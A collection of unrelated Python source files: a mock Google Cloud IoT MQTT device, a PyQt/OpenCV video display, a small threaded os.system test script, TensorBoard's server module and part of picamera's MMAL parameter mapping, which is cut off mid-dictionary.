cameraThread.start()
self.threads.append(cameraThread)
def stop(self):
self.threadAlive = False
for t in self.threads:
t.join()
|
mock-device.py
|
import argparse
from datetime import datetime
import json
import os
import ssl
import time
import random
import threading
import logging
import asyncio
import paho.mqtt.client as mqtt
from connection import create_jwt, error_str
# To set up the device
# EXPORT "GOOGLE_CLOUD_PROJECT"
# EXPORT "PROJECT_ID"
# EXPORT "DEVICE_ID"
class Device(object):
"""Represents the state of a single device."""
def __init__(self, deviceId):
self.running = True
self.controlled = False
self.connected = False
# List of allowable Status; Idling, Moving, Stuck, Frozen, Picked Up, Task Completed
self.listOfStatus = ["Idling", "Moving", "Stuck", "Frozen", "Picked Up", "Task Completed"]
self.status = "Idling"
self.taskQueue = []
self.task = ""
self.deviceId = deviceId
def setup_telemetry_data(self):
# dateTime = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# timeZone = time.strftime("%Z", time.gmtime())
timeStamp = "{}".format(datetime.now().astimezone().isoformat(timespec='minutes'))
# objects = ["Person", "Dog", "Wall", "Car", "Cat", "Cups", "Scissors", "Pen", "Bicycle"]
tasks = ["Location A", "Location B", "Location C", "Location D", "Location E", "Location F", ""]
noOfObjects = random.randint(0, 5)
# objectsDetected = random.choices(objects, k=noOfObjects)[0]
self.status = random.choices(self.listOfStatus, k=1)[0]
self.task = random.choices(tasks, k=1)[0]
if self.status == "Frozen":
if noOfObjects <= 4:
self.status = "Moving"
if self.status == "Stuck":
self.status = "Moving"
mockdata = {"TimeStamp":timeStamp,"Device": self.deviceId, "No_Of_Objects":noOfObjects, "Status":self.status, "Task":self.task}
print(mockdata)
return json.dumps(mockdata)
async def performTask(self):
for pTask in self.taskQueue:
taskPeriod = random.randint(10,20)
asyncio.sleep(taskPeriod)
print("Performing Task: {}".format(pTask))
self.task = pTask
return
def update(self):
"""This function will update the variables
"""
if self.status == "Idling":
taskThread = threading.Thread(target=self.performTask)
taskThread.start()
return self.setup_telemetry_data()
def wait_for_connection(self, timeout):
"""Wait for the device to become connected."""
total_time = 0
while not self.connected and total_time < timeout:
time.sleep(1)
total_time += 1
if not self.connected:
raise RuntimeError('Could not connect to MQTT bridge.')
def on_connect(self, unused_client, unused_userdata, unused_flags, rc):
"""Callback for when a device connects."""
logging.debug('Connection Result:', error_str(rc))
self.connected = True
def on_disconnect(self, unused_client, unused_userdata, rc):
"""Callback for when a device disconnects."""
logging.debug('Disconnected:', error_str(rc))
self.connected = False
def on_publish(self, unused_client, unused_userdata, unused_mid):
"""Callback when the device receives a PUBACK from the MQTT bridge."""
print('Published message acked.')
def on_subscribe(self, unused_client, unused_userdata, unused_mid,
granted_qos):
"""Callback when the device receives a SUBACK from the MQTT bridge."""
print('Subscribed: ', granted_qos)
if granted_qos[0] == 128:
print('Subscription failed.')
def on_message(self, unused_client, unused_userdata, message):
"""Callback when the device receives a message on a subscription."""
payload = message.payload.decode('utf-8')
print('Received message \'{}\' on topic \'{}\' with Qos {}'.format(
payload, message.topic, str(message.qos)))
# The device will receive its latest config when it subscribes to the
# config topic. If there is no configuration for the device, the device
# will receive a config with an empty payload.
if not payload:
return
structuredData = json.loads(payload)
if "Task" in structuredData:
self.taskQueue.extend(structuredData["Task"])
if "Deactivate" in structuredData:
if structuredData["Deactivate"] == True:
self.running = False
def parse_command_line_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description=(
'Example Google Cloud IoT Core MQTT device connection code.'))
parser.add_argument(
'--project_id',
default=os.environ.get('GOOGLE_CLOUD_PROJECT'),
help='GCP cloud project name')
parser.add_argument(
'--registry_id',
default=os.environ.get('REGISTRY_ID'),
help='Cloud IoT Core registry id')
parser.add_argument(
'--device_id',
default=os.environ.get('DEVICE_ID'),
help='Cloud IoT Core device id')
parser.add_argument(
'--private_key_file',
default="rsa_private.pem",
help='Path to private key file.')
parser.add_argument(
'--algorithm',
choices=('RS256', 'ES256'),
default="RS256",
help='Which encryption algorithm to use to generate the JWT.')
parser.add_argument(
'--cloud_region',
default='asia-east1',
help='GCP cloud region')
parser.add_argument(
'--ca_certs',
default='roots.pem',
help=('CA root from https://pki.google.com/roots.pem'))
parser.add_argument(
'--mqtt_bridge_hostname',
default='mqtt.googleapis.com',
help='MQTT bridge hostname.')
parser.add_argument(
'--mqtt_bridge_port',
default=8883,
type=int,
help='MQTT bridge port.')
return parser.parse_args()
def main():
args = parse_command_line_args()
# Create our MQTT client. The client_id is a unique string that identifies
# this device. For Google Cloud IoT Core, it must be in the format below.
client = mqtt.Client(
client_id=('projects/{}/locations/{}/registries/{}/devices/{}'
.format(
args.project_id,
args.cloud_region,
args.registry_id,
args.device_id)))
# With Google Cloud IoT Core, the username field is ignored, and the
# password field is used to transmit a JWT to authorize the device.
client.username_pw_set(
username='unused',
password=create_jwt(
args.project_id, args.private_key_file, args.algorithm))
# Enable SSL/TLS support.
client.tls_set(ca_certs=args.ca_certs)
device = Device(args.device_id)
# Handling callbacks from Cloud IoT
client.on_connect = device.on_connect
client.on_publish = device.on_publish
client.on_disconnect = device.on_disconnect
client.on_subscribe = device.on_subscribe
client.on_message = device.on_message
client.connect(args.mqtt_bridge_hostname, args.mqtt_bridge_port)
client.loop_start()
# This is the topic that the device will receive commands on.
mqtt_config_topic = '/devices/{}/config'.format(args.device_id)
# This is the topic that the device will publish telemetry data on
mqtt_publish_topic = '/devices/{}/events'.format(args.device_id)
# Ensure connection in case of unstable internet
device.wait_for_connection(5)
# Listen to the config topic for commands from
client.subscribe(mqtt_config_topic, qos=1)
while (device.running):
payload = device.update()
# Publish "payload" to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
client.publish(mqtt_publish_topic, payload, qos=1)
time.sleep(1)
client.disconnect()
client.loop_stop()
print('Finished loop successfully. Goodbye!')
if __name__ == '__main__':
main()
|
VideoDisplay.py
|
import sys
import time
import cv2
import threading
from PyQt5.QtCore import QFile
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.QtGui import QImage, QPixmap
# import DisplayUI
# from Camera import Camera
# from multiprocessing import Process
# from SegModel import *
from model.SegModel import SegModel
class Display:
def __init__(self):
self.threads=list()
self.closeToggles=list()
self.currentStates=list()
self.showLabels=list()
# 默认视频源为文件
self.capdict=dict()
self.frameRatedict=dict()
self.isCamera = False
self.fps=120
self.stopEvent = threading.Event()
self.stopEvent.clear()
self.seg = SegModel()
self.maththread=threading.Thread(target=self.seg.Analysis)
self.maththread.start()
# def reset(self):
# #设置应该关闭的信号
def FiniSignal(self):
return self.seg.finiSignal
def init(self,LabelList):
self.stopEvent.set()
time.sleep(0.5)
self.stopEvent.clear()
self.showLabels=LabelList
self.closeToggles=[0]*len(self.showLabels)
self.currentStates=["-1"]*len(self.showLabels)
#获得可用的显示label索引
def GetCurrentLabelIndex(self):
index=0;
for state in self.currentStates:
if state=="-1":
return index
index+=1
return -1;
def GetLabelIndexByID(self,ID):
index = 0;
for state in self.currentStates:
if state == ID:
return index
index += 1
return -1;
def Open(self,Camera,CID):
index=self.GetCurrentLabelIndex()
self.capdict[index] = cv2.VideoCapture(Camera.GetUrl())
self.frameRatedict[index]=self.capdict[index].get(cv2.CAP_PROP_FPS)
# 创建视频显示线程
self.currentStates[index]=CID
th = threading.Thread(target = self.Display,args=(index,))
th.start()
def Close(self,index):
self.closeToggles[index]=1
def CloseAll(self):
# 关闭事件设为触发,关闭视频播放
self.stopEvent.set()
self.seg.stopEvent.set()
def Display(self,index):
showLabel=self.showLabels[index]
count=0
while self.capdict[index].isOpened():
success, frame = self.capdict[index].read()
if success is False:
print("Ended")
break
count+=1
if count%self.fps==0:
cv2.imwrite('images/'+self.currentStates[index] +"_"+ str(count) + '.png', frame)
# RGB转BGR
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
img = QImage(frame.data, frame.shape[1], frame.shape[0], QImage.Format_RGB888)
showLabel.setPixmap(QPixmap.fromImage(img))
if self.isCamera:
cv2.waitKey(1)
else:
cv2.waitKey(int(1000 / self.frameRatedict[index]))
# 判断关闭事件是否已触发
if self.closeToggles[index]==1:
self.closeToggles[index]==0
self.currentStates[index]=="-1"
self.capdict[index].release()
break
if True == self.stopEvent.is_set():
# 关闭事件置为未触发,清空显示label
break
|
test_os_run.py
|
import os
import threading
for i in range(8):
threading.Thread(target=os.system,args=('python test_rabbitmq_consume.py',)).start()
|
server.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import re
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import io_wrapper
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]*://.*")
for specification in logdir.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if uri_pattern.match(specification) is None and \
':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon_threads = True
def BuildServer(multiplexer, host, port, logdir):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
logdir: The logdir argument string that tensorboard started up with.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer, logdir)
return ThreadedHTTPServer((host, port), factory)
|
mmalobj.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANALOG_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BLACK_LEVEL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CCM_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
# mmal.MMAL_PARAMETER_CROP: mmal.MMAL_PARAMETER_CROP_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
# mmal.MMAL_PARAMETER_CUSTOM_CCM: mmal.MMAL_PARAMETER_CUSTOM_CCM_T,
mmal.MMAL_PARAMETER_DIGITAL_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LENS_SHADING_OVERRIDE: mmal.MMAL_PARAMETER_LENS_SHADING_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_OUTPUT_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
# mmal.MMAL_PARAMETER_RESIZE_PARAMS: mmal.MMAL_PARAMETER_RESIZE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
